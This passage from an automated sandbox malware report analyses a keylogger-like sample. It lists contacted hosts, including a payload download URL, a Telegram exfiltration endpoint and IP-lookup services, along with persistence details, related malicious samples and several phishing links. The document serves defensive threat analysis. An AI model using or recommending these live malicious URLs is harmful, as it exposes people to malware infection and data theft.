00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://checkip.dyndns.org/qNdnownts.exe, 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003046000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002550000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://github.com/mgravell/protobuf-netNdnownts.exe, 00000000.00000002.1758474408.0000000006240000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		unknown
                                          https://reallyfreegeoip.orgInstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://checkip.dyndns.orgInstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030F7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002525000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://checkip.dyndns.comInstallUtil.exe, 00000001.00000002.4150876359.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003125000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000003116000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.00000000030E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002620000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.00000000025D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://api.telegram.orgInstallUtil.exe, 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNdnownts.exe, 00000000.00000002.1741258818.0000000002581000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002471000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nexoproducciones.cl/Yinmwpj.pdfKThisNdnownts.exe, IsInvalid.exe.0.drtrue
                                              		unknown
                                              https://nexoproducciones.clNdnownts.exe, 00000000.00000002.1741258818.0000000002581000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.0000000002F71000.00000004.00000800.00020000.00000000.sdmptrue
                                                		unknown
                                                https://reallyfreegeoip.org/xml/Ndnownts.exe, 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Ndnownts.exe, 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4150876359.000000000302E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, IsInvalid.exe, 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4151007876.0000000002538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                149.154.167.220
                                                		api.telegram.orgUnited Kingdom
                                                		62041TELEGRAMRUtrue
                                                188.114.97.3
                                                		reallyfreegeoip.orgEuropean Union
                                                		13335CLOUDFLARENETUStrue
                                                193.122.130.0
                                                		checkip.dyndns.comUnited States
                                                		31898ORACLE-BMC-31898USfalse
                                                190.107.177.80
                                                		nexoproducciones.clChile
                                                		265831SOCCOMERCIALWIRENETCHILELTDACLfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1545025
                                                Start date and time:2024-10-30 01:41:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 10s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:9
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Ndnownts.exe
                                                (renamed file extension from exe_ to exe)
                                                Original Sample Name:Ndnownts.exe_
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
                                                EGA Information:
                                                • Successful, ratio: 25%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 322
                                                • Number of non-executed functions: 16
                                                Cookbook Comments:
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target InstallUtil.exe, PID 5544 because it is empty
                                                • Execution Graph export aborted for target IsInvalid.exe, PID 3688 because it is empty
                                                • Execution Graph export aborted for target Ndnownts.exe, PID 4544 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                00:42:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs
                                                20:41:59API Interceptor44x Sleep call for process: Ndnownts.exe modified
                                                20:42:08API Interceptor15924774x Sleep call for process: InstallUtil.exe modified
                                                20:42:18API Interceptor33x Sleep call for process: IsInvalid.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                149.154.167.220installer.exeGet hashmaliciousUnknownBrowse
                                                  installer.exeGet hashmaliciousUnknownBrowse
                                                    installer.exeGet hashmaliciousUnknownBrowse
                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                        z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          DA92phBHUS.exeGet hashmaliciousXWormBrowse
                                                            ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                              https://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                  Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    188.114.97.3zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                    • touxzw.ir/alpha2/five/fre.php
                                                                    rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                    • www.launchdreamidea.xyz/2b9b/
                                                                    rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                    • ghcopz.shop/ClarkB/PWS/fre.php
                                                                    PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                    SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                    • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                    5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                    • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                    PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                    • www.cc101.pro/4hfb/
                                                                    QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/cDXpxO66/download
                                                                    Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                    • tech-tribune.shop/pLQvfD4d5/index.php
                                                                    WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                    • tech-tribune.shop/pLQvfD4d5/index.php
                                                                    193.122.130.0Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    na.docGet hashmaliciousMassLogger RATBrowse
                                                                    • checkip.dyndns.org/
                                                                    na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • checkip.dyndns.org/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    reallyfreegeoip.orgINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 188.114.96.3
                                                                    z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 188.114.96.3
                                                                    Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 188.114.97.3
                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    checkip.dyndns.comINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 193.122.6.168
                                                                    z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 132.226.8.169
                                                                    Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 132.226.247.73
                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    nexoproducciones.clDocumentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 190.107.177.80
                                                                    Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                    • 190.107.177.80
                                                                    q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                                                                    • 104.21.10.178
                                                                    6Ek4nfs2y1.exeGet hashmaliciousPhoenixKeylogger, PureLog StealerBrowse
                                                                    • 104.21.10.178
                                                                    q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                                                                    • 104.21.10.178
                                                                    filesno5670023475729374.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 104.21.10.178
                                                                    Transferir copia________________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 104.21.10.178
                                                                    Solicitud de presupuesto_____________________________.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 104.21.10.178
                                                                    Orders34754733________________________pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 172.67.146.41
                                                                    api.telegram.orginstaller.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    installer.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    installer.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    installer.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 149.154.167.220
                                                                    DA92phBHUS.exeGet hashmaliciousXWormBrowse
                                                                    • 149.154.167.220
                                                                    ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    https://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 149.154.167.220

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    TELEGRAMRUinstaller.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    installer.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    installer.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    installer.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 149.154.167.220
                                                                    DA92phBHUS.exeGet hashmaliciousXWormBrowse
                                                                    • 149.154.167.220
                                                                    ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    https://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    ZoomInstaller.exeGet hashmaliciousUnknownBrowse
                                                                    • 149.154.167.220
                                                                    Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 149.154.167.220
                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    • 188.114.96.3
                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    • 104.21.43.145
                                                                    completedfiles.....pdfGet hashmaliciousUnknownBrowse
                                                                    • 104.21.63.172
                                                                    https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                                                    • 104.18.86.42
                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 172.64.41.3
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 188.114.97.3
                                                                    https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTTGet hashmaliciousUnknownBrowse
                                                                    • 188.114.96.3
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 188.114.96.3
                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.180.76
                                                                    SOCCOMERCIALWIRENETCHILELTDACLDocumentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 190.107.177.80
                                                                    Supplier RFQ ID 365242213q___________________________pdf.exeGet hashmaliciousSnake Keylogger, XRedBrowse
                                                                    • 190.107.177.80
                                                                    http://streetmap.co.uk/redirect?id=bookingcom&xc=147190&yc=507490&d=http://tecconat.cl/gls/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 200.63.97.130
                                                                    http://streetmap.co.uk/redirect?id=bookingcom&xc=147190&yc=507490&d=http://tecconat.cl/gls/index.htmlGet hashmaliciousUnknownBrowse
                                                                    • 200.63.97.130
                                                                    https://metacognicion.cl/Get hashmaliciousUnknownBrowse
                                                                    • 138.117.148.176
                                                                    https://m.exactag.com/ai.aspx?tc=d9608989bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253APGI.medamax.com.ar/index.xml%23?email=b2xpdmVyLnNjaHVzdGVyQHZvc3Nsb2guY29tGet hashmaliciousHTMLPhisherBrowse
                                                                    • 138.117.148.153
                                                                    https://wtf.cl/admin/Get hashmaliciousUnknownBrowse
                                                                    • 200.63.97.130
                                                                    Team.vbsGet hashmaliciousAgentTeslaBrowse
                                                                    • 190.107.177.239
                                                                    Proforma Invoice242103.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 190.107.177.239
                                                                    Invoice032.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                    • 190.107.177.239
                                                                    ORACLE-BMC-31898USINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 193.122.6.168
                                                                    Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    z74fBF2ObiS1g87mbS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    z19UrgentOrder.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 193.122.6.168
                                                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 144.25.107.42
                                                                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 130.61.64.122

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    54328bd36c14bd82ddaa0c04b25ed9adINVOICE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 188.114.97.3
                                                                    z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                    • 188.114.97.3
                                                                    Documentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                    • 188.114.97.3
                                                                    rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.97.3
